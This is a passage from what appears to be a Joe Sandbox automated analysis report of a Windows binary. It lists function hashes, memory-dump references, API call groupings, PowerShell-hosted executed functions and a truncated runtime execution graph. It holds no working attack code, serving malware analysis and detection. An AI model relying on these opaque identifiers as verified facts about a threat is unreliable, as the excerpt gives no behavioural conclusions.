                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2735977093-0
                                                                                                            • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                                                                            • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                                                                            • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                                                                            • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                                                                            Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4012708801-0
                                                                                                            • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                                                                            • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                                                                            • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                                                                            • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                                                                            Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 830345296-0
                                                                                                            • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                            • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                                                                            • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                            • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                                                                            Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1807340688-0
                                                                                                            • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                                                                            • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                                                                            • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                                                                            • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                                                                            Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3901518246-0
                                                                                                            • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                                                                            • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                                                                            • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                                                                            • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                                                                            Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 830345296-0
                                                                                                            • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                            • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                                                                            • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                            • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                                                                            Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2735977093-0
                                                                                                            • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                                                                            • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                                                                            • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                                                                            • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                                                                            Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 1298188129-0
                                                                                                            • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                            • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                                                                            • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                            • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                                                                            Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4254243056-0
                                                                                                            • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                            • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                                                                            • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                            • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                                                                            Executed Functions

                                                                                                            Function 00007FFD9B8937B5 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1828485306.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                            • Instruction ID: 5b86534c8524b0afe59b57662357e645227b18a14a5c8e3dcc67305ce5c1f501
                                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                            • Instruction Fuzzy Hash: D001677121CB0D8FDB48EF0CE451AA6B7E0FB99364F10056DE58AC36A5D636E882CB45

                                                                                                            Executed Functions

                                                                                                            Function 00007FFD9B980B74 Relevance: .9, Instructions: 883COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 03512dd59b8a4eb54d8985431c059dea1b530c3139e98f17625ba63182929a5a
                                                                                                            • Instruction ID: a4d56880ae6862f7613a493bbae7d0e9db10927cce82d8a49ce27b2652a7fdfd
                                                                                                            • Opcode Fuzzy Hash: 03512dd59b8a4eb54d8985431c059dea1b530c3139e98f17625ba63182929a5a
                                                                                                            • Instruction Fuzzy Hash: C6422622B1EE8D5FE7A69B6C48746B57BE1EF56710B0901FBD08CC71A3DA28AD05C341
                                                                                                            Function 00007FFD9B9817EE Relevance: .2, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2f9f1b46c1b922d61cf8cd9f76fe741ca7a1e5b335fa67215688aaf182c9adc
                                                                                                            • Instruction ID: 1909b8f181cfcf7f234dafd4203ed843a548fdc6c813cfb2f86ea3643de21d70
                                                                                                            • Opcode Fuzzy Hash: e2f9f1b46c1b922d61cf8cd9f76fe741ca7a1e5b335fa67215688aaf182c9adc
                                                                                                            • Instruction Fuzzy Hash: 84410632B2DE1E5FF7B8975C74275B973D1EF88224B45027BD44EC35A6DE38A9024281
                                                                                                            Function 00007FFD9B981817 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4eae611e077b75bc28eda47b51d16390b41cb8a7312f2d0b33c30607508474de
                                                                                                            • Instruction ID: 45b54e0a4620f5f5e7686209586a910073c158501751a56b15f86e2961f89e05
                                                                                                            • Opcode Fuzzy Hash: 4eae611e077b75bc28eda47b51d16390b41cb8a7312f2d0b33c30607508474de
                                                                                                            • Instruction Fuzzy Hash: B511E922F2ED2E5BF3B8935C74771B923C2EF88218B460276E41DC35A5DE3C6D420182
                                                                                                            Function 00007FFD9B980EDC Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 393d637499f237338628550ae9598cbd5b2989a2cfcf9ee52db8b5090fdb2560
                                                                                                            • Instruction ID: bcd0ba01004ec27e20eb5432c0b8f4f80e87c0b42c42bb73b9cce2b9277973ba
                                                                                                            • Opcode Fuzzy Hash: 393d637499f237338628550ae9598cbd5b2989a2cfcf9ee52db8b5090fdb2560
                                                                                                            • Instruction Fuzzy Hash: 4201DB22F2FD1E1BF7B8935C143467956C2DF84B61F5540BAD40DC3596DE189C014381
                                                                                                            Function 00007FFD9B9804D8 Relevance: .0, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 803d70b779626e71b73a8d04ae23513870f50c65f222dd16f648191229e8223f
                                                                                                            • Instruction ID: 5ef266a86ff8ad2c3676219ad5fe1f3df442a27d225ecbdd4726e2b41fe1fcd2
                                                                                                            • Opcode Fuzzy Hash: 803d70b779626e71b73a8d04ae23513870f50c65f222dd16f648191229e8223f
                                                                                                            • Instruction Fuzzy Hash: CAE0D833F0EC2D5FEBB5E6AC28391F86380DF54A2170501B7E91CD3191ED149C114391

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:17.6%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:46
                                                                                                            execution_graph 17383 306090 17384 3060ad _strlen 17383->17384 17385 30609f 17383->17385 17387 3060fc X64Call 17384->17387 17388 3060ca 17384->17388 17385->17384 17389 305cc0 17385->17389 17387->17388 17419 305c70 17389->17419 17391 305ce3 17398 305cf5 17391->17398 17423 324619 17391->17423 17393 305d86 17394 324619 _malloc 66 API calls 17393->17394 17393->17398 17395 305de5 17394->17395 17396 305df7 17395->17396 17399 305e2b 17395->17399 17440 306810 17396->17440 17398->17384 17400 324619 _malloc 66 API calls 17399->17400 17401 305e6c 17400->17401 17402 305e7e 17401->17402 17411 305ebe 17401->17411 17403 306810 66 API calls 17402->17403 17404 305e9e 17403->17404 17405 306810 66 API calls 17404->17405 17405->17398 17406 305fb8 17407 306810 66 API calls 17406->17407 17408 305fd8 17407->17408 17409 306810 66 API calls 17408->17409 17413 305fe4 17409->17413 17410 305f51 17412 306810 66 API calls 17410->17412 17411->17406 17411->17410 17414 305f8a 17412->17414 17415 306810 66 API calls 17413->17415 17416 306810 66 API calls 17414->17416 17415->17398 17417 305f96 17416->17417 17418 306810 66 API calls 17417->17418 17418->17398 17420 305c7c 17419->17420 17422 305c85 17419->17422 17421 305c92 GetModuleHandle64 17420->17421 17420->17422 17421->17422 17422->17391 17424 324696 17423->17424 17432 324627 17423->17432 17425 3287b8 _malloc DecodePointer 17424->17425 17426 32469c 17425->17426 17428 3272de __fptostr 65 API calls 17426->17428 17439 32468e 17428->17439 17429 324655 RtlAllocateHeap 17429->17432 17429->17439 17431 324682 17482 3272de 17431->17482 17432->17429 17432->17431 17436 324680 17432->17436 17437 324632 17432->17437 17480 3287b8 DecodePointer 17432->17480 17438 3272de __fptostr 65 API calls 17436->17438 17437->17432 17444 3298b5 17437->17444 17453 329706 17437->17453 17477 329420 17437->17477 17438->17439 17439->17393 17441 306821 17440->17441 17442 306839 17440->17442 17441->17442 17443 3246ad _free 66 API calls 17441->17443 17442->17398 17443->17442 17485 32da4d 17444->17485 17446 3298bc 17447 32da4d __FF_MSGBANNER 66 API calls 17446->17447 17449 3298c9 17446->17449 17447->17449 17448 329706 __NMSG_WRITE 66 API calls 17450 3298e1 17448->17450 17449->17448 17451 3298eb 17449->17451 17452 329706 __NMSG_WRITE 66 API calls 17450->17452 17451->17437 17452->17451 17454 329727 __NMSG_WRITE 17453->17454 17456 32da4d __FF_MSGBANNER 63 API calls 17454->17456 17476 329843 17454->17476 17455 327fff __setmbcp_nolock 5 API calls 17457 3298b3 17455->17457 17458 329741 17456->17458 17457->17437 17459 329852 GetStdHandle 17458->17459 17460 32da4d __FF_MSGBANNER 63 API calls 17458->17460 17462 329860 _strlen 17459->17462 17459->17476 17461 329752 17460->17461 17461->17459 17463 329764 17461->17463 17465 329896 WriteFile 17462->17465 17462->17476 17463->17476 17519 32d9ea 17463->17519 17465->17476 17467 329790 GetModuleFileNameW 17468 3297b1 17467->17468 17472 3297bd _wcslen 17467->17472 17469 32d9ea __NMSG_WRITE 63 API calls 17468->17469 17469->17472 17470 32723a __invoke_watson 10 API calls 17470->17472 17471 32d8a8 63 API calls __NMSG_WRITE 17471->17472 17472->17470 17472->17471 17474 329833 17472->17474 17526 32d91d 17472->17526 17535 32d73c 17474->17535 17476->17455 17554 3293f5 GetModuleHandleW 17477->17554 17481 3287cd 17480->17481 17481->17432 17557 328145 GetLastError 17482->17557 17484 3272e3 17484->17436 17486 32da59 17485->17486 17487 32da63 17486->17487 17488 3272de __fptostr 66 API calls 17486->17488 17487->17446 17489 32da7c 17488->17489 17492 32728c 17489->17492 17495 32725f DecodePointer 17492->17495 17496 327274 17495->17496 17501 32723a 17496->17501 17498 32728b 17499 32725f __fptostr 10 API calls 17498->17499 17500 327298 17499->17500 17500->17446 17504 327111 17501->17504 17505 327130 _memset __call_reportfault 17504->17505 17506 32714e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17505->17506 17507 32721c __call_reportfault 17506->17507 17510 327fff 17507->17510 17509 327238 GetCurrentProcess TerminateProcess 17509->17498 17511 328007 17510->17511 17512 328009 IsDebuggerPresent 17510->17512 17511->17509 17518 32c455 17512->17518 17515 32c572 SetUnhandledExceptionFilter UnhandledExceptionFilter 17516 32c597 GetCurrentProcess TerminateProcess 17515->17516 17517 32c58f __call_reportfault 17515->17517 17516->17509 17517->17516 17518->17515 17520 32d9f8 17519->17520 17521 32da14 17520->17521 17522 3272de __fptostr 66 API calls 17520->17522 17523 32da04 17522->17523 17524 32728c __fptostr 11 API calls 17523->17524 17525 329785 17524->17525 17525->17467 17525->17472 17530 32d92f 17526->17530 17527 32d933 17528 32d938 17527->17528 17529 3272de __fptostr 66 API calls 17527->17529 17528->17472 17531 32d94f 17529->17531 17530->17527 17530->17528 17533 32d976 17530->17533 17532 32728c __fptostr 11 API calls 17531->17532 17532->17528 17533->17528 17534 3272de __fptostr 66 API calls 17533->17534 17534->17531 17553 32800e EncodePointer 17535->17553 17537 32d762 17538 32d772 LoadLibraryW 17537->17538 17539 32d7ef 17537->17539 17540 32d887 17538->17540 17541 32d787 GetProcAddress 17538->17541 17545 32d809 DecodePointer DecodePointer 17539->17545 17550 32d81c 17539->17550 17546 327fff __setmbcp_nolock 5 API calls 17540->17546 17541->17540 17544 32d79d 7 API calls 17541->17544 17542 32d852 DecodePointer 17543 32d87b DecodePointer 17542->17543 17547 32d859 17542->17547 17543->17540 17544->17539 17548 32d7df GetProcAddress EncodePointer 17544->17548 17545->17550 17549 32d8a6 17546->17549 17547->17543 17551 32d86c DecodePointer 17547->17551 17548->17539 17549->17476 17550->17542 17550->17543 17552 32d83f 17550->17552 17551->17543 17551->17552 17552->17543 17553->17537 17555 329409 GetProcAddress 17554->17555 17556 329419 ExitProcess 17554->17556 17555->17556 17571 328020 TlsGetValue 17557->17571 17560 3281b2 SetLastError 17560->17484 17563 328178 DecodePointer 17564 32818d 17563->17564 17565 328191 17564->17565 17566 3281a9 17564->17566 17580 328091 17565->17580 17593 3246ad 17566->17593 17569 328199 GetCurrentThreadId 17569->17560 17570 3281af 17570->17560 17572 328050 17571->17572 17573 328035 DecodePointer TlsSetValue 17571->17573 17572->17560 17574 32c193 17572->17574 17573->17572 17576 32c19c 17574->17576 17577 328170 17576->17577 17578 32c1ba Sleep 17576->17578 17599 32e3e2 17576->17599 17577->17560 17577->17563 17579 32c1cf 17578->17579 17579->17576 17579->17577 17608 32b160 17580->17608 17582 32809d GetModuleHandleW 17609 32c725 17582->17609 17584 3280db InterlockedIncrement 17616 328133 17584->17616 17587 32c725 __lock 64 API calls 17588 3280fc 17587->17588 17619 32901c InterlockedIncrement 17588->17619 17590 32811a 17631 32813c 17590->17631 17592 328127 _raise 17592->17569 17594 3246e1 _free 17593->17594 17595 3246b8 HeapFree 17593->17595 17594->17570 17595->17594 17596 3246cd 17595->17596 17597 3272de __fptostr 64 API calls 17596->17597 17598 3246d3 GetLastError 17597->17598 17598->17594 17600 32e3ee 17599->17600 17606 32e409 17599->17606 17601 32e3fa 17600->17601 17600->17606 17602 3272de __fptostr 65 API calls 17601->17602 17604 32e3ff 17602->17604 17603 32e41c HeapAlloc 17605 32e443 17603->17605 17603->17606 17604->17576 17605->17576 17606->17603 17606->17605 17607 3287b8 _malloc DecodePointer 17606->17607 17607->17606 17608->17582 17610 32c73a 17609->17610 17611 32c74d EnterCriticalSection 17609->17611 17634 32c663 17610->17634 17611->17584 17613 32c740 17613->17611 17659 3296c2 17613->17659 17707 32c64c LeaveCriticalSection 17616->17707 17618 3280f5 17618->17587 17620 32903a InterlockedIncrement 17619->17620 17621 32903d 17619->17621 17620->17621 17622 329047 InterlockedIncrement 17621->17622 17623 32904a 17621->17623 17622->17623 17624 329057 17623->17624 17625 329054 InterlockedIncrement 17623->17625 17626 329061 InterlockedIncrement 17624->17626 17627 329064 17624->17627 17625->17624 17626->17627 17628 32907d InterlockedIncrement 17627->17628 17629 32908d InterlockedIncrement 17627->17629 17630 329098 InterlockedIncrement 17627->17630 17628->17627 17629->17627 17630->17590 17708 32c64c LeaveCriticalSection 17631->17708 17633 328143 17633->17592 17635 32c66f _raise 17634->17635 17636 3298b5 __FF_MSGBANNER 65 API calls 17635->17636 17649 32c695 17635->17649 17637 32c684 17636->17637 17641 329706 __NMSG_WRITE 65 API calls 17637->17641 17638 32c6a5 _raise 17638->17613 17644 32c68b 17641->17644 17642 32c6c6 17646 32c725 __lock 65 API calls 17642->17646 17643 32c6b7 17645 3272de __fptostr 65 API calls 17643->17645 17647 329420 _malloc 3 API calls 17644->17647 17645->17638 17648 32c6cd 17646->17648 17647->17649 17650 32c700 17648->17650 17651 32c6d5 InitializeCriticalSectionAndSpinCount 17648->17651 17649->17638 17666 32c14e 17649->17666 17654 3246ad _free 65 API calls 17650->17654 17652 32c6e5 17651->17652 17653 32c6f1 17651->17653 17655 3246ad _free 65 API calls 17652->17655 17671 32c71c 17653->17671 17654->17653 17657 32c6eb 17655->17657 17658 3272de __fptostr 65 API calls 17657->17658 17658->17653 17660 3298b5 __FF_MSGBANNER 66 API calls 17659->17660 17661 3296cc 17660->17661 17662 329706 __NMSG_WRITE 66 API calls 17661->17662 17663 3296d4 17662->17663 17675 32968e 17663->17675 17668 32c157 17666->17668 17667 324619 _malloc 65 API calls 17667->17668 17668->17667 17669 32c18d 17668->17669 17670 32c16e Sleep 17668->17670 17669->17642 17669->17643 17670->17668 17674 32c64c LeaveCriticalSection 17671->17674 17673 32c723 17673->17638 17674->17673 17678 329538 17675->17678 17677 32969f 17679 329544 _raise 17678->17679 17680 32c725 __lock 61 API calls 17679->17680 17681 32954b 17680->17681 17683 329576 DecodePointer 17681->17683 17687 3295f5 17681->17687 17684 32958d DecodePointer 17683->17684 17683->17687 17697 3295a0 17684->17697 17685 329672 _raise 17685->17677 17701 329663 17687->17701 17690 32965a 17691 329420 _malloc 3 API calls 17690->17691 17692 329663 17691->17692 17693 329670 17692->17693 17706 